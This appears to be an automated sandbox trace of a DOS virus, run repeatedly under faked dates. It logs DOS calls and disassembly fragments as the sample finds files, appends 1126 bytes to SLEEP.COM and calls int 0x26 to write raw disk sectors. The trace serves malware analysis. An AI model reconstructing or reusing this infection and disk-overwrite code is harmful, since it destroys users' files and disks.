2018-12-25T12:45:11.89352344Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:11.896418566Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:11.907280463Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:11.90893285Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:11.916263771Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:11.919071536Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:11.921572273Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:11.924732014Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:11.926450225Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.928791776Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:11.938530724Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.941585279Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:11.94391342Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:11.953768339Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:11.966357219Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:11.969159877Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:11.973959797Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:11.962618918Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:11.964482913Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:11.966450063Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:11.969067408Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:11.970501918Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:11.974480903Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:11.978442712Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:11.982825757Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:11.984951765Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:13.364204641Z 62 PC: 12cac | Close file
2018-12-25T12:45:13.366968058Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:13.530858407Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:13.537264056Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.539914553Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.542748214Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:13.544001786Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.546141889Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:13.646805394Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.648936329Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:13.650456725Z 62 PC: 12d11 | Close file
2018-12-25T12:45:13.826344634Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:13.948618394Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:13.951134973Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.957900419Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.964015089Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.965974374Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.179535524Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.181665453Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.194067322Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.205215497Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.208086133Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.210903553Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.213544298Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.216005675Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.224457197Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.227394466Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.228945112Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.236968238Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.247288698Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.249807646Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.256445176Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.264022003Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.265800305Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.272170526Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.273470699Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.278890403Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.280756487Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.282520954Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.28527873Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.286279971Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.287774437Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.293856761Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.295449819Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.296604975Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.30245882Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.309342882Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.311248591Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.316981193Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:12.040745699Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:12.043265254Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:12.045443359Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:12.048123616Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:12.049316374Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:12.056103824Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.063159246Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:12.067519749Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:12.069056381Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:13.363181612Z 62 PC: 12cac | Close file
2018-12-25T12:45:13.365596344Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:13.373381729Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:13.517336173Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.519794793Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.522782133Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:13.523987898Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.525897835Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:13.606125426Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.608893459Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:13.610249226Z 62 PC: 12d11 | Close file
2018-12-25T12:45:13.754780197Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:13.850603876Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:13.853442207Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.861669216Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.868131523Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.870362102Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.106476129Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.108831711Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.115733359Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.119194215Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.122860944Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.126028747Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.128529665Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.130867963Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.181195957Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.190611902Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.192245415Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.20089728Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.211292966Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.214319825Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.221225587Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.228748874Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.2315117Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.24189756Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.244173277Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.249846072Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.251774295Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.253589048Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.256030292Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.257163049Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.258591052Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.264625184Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.26691855Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.268381761Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.275967091Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.285698826Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.288104027Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.293412951Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:12.201890303Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:12.204402546Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:12.207415591Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:12.211295604Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:12.212777207Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:12.21858072Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.225021022Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:12.231415375Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:12.233837128Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:13.364948812Z 62 PC: 12cac | Close file
2018-12-25T12:45:13.36701148Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:13.373899154Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:13.585098369Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.588453811Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.591152029Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:13.59236934Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.594412314Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:13.662079532Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.664111722Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:13.665439571Z 62 PC: 12d11 | Close file
2018-12-25T12:45:13.826297398Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:13.948931031Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:13.951911639Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.959538768Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.965929019Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.967992728Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.180864396Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.184115199Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.191047127Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.194856323Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.197518168Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.200124193Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.202306362Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.204654434Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.213127313Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.215544512Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.217404473Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.226926069Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.23717847Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.240279715Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.246710395Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.253582604Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.256781735Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.266519432Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.268715069Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.276238472Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.278953066Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.281506879Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.286068824Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.287665162Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.290077982Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.299429334Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.302070227Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.30383204Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.311632247Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.32339228Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.325857257Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.330115286Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:12.688680713Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:12.697638182Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:12.700338656Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:12.704171623Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:12.705881146Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:12.712425759Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.720724646Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:12.731075136Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:12.733266391Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.182625441Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.186310892Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.193778206Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.200525625Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.203461598Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.205469217Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.206597921Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.208310386Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.216363777Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.222119411Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.223512586Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.231230082Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.240961548Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.243839099Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.251104101Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.258809722Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.26125824Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.272326341Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.274178104Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.280764136Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.286593037Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.28915235Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.29175525Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.294224797Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.296409985Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.304879347Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.307402423Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.309414561Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.317062967Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.32823171Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.330853825Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.337795305Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.345053409Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.347576359Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.357907093Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.36002835Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.367996441Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.371077812Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.373946985Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.37785667Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.379549722Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.381897828Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.391006104Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.393997849Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.395717633Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.403780266Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.413793899Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.416197433Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.420741727Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:12.774584079Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
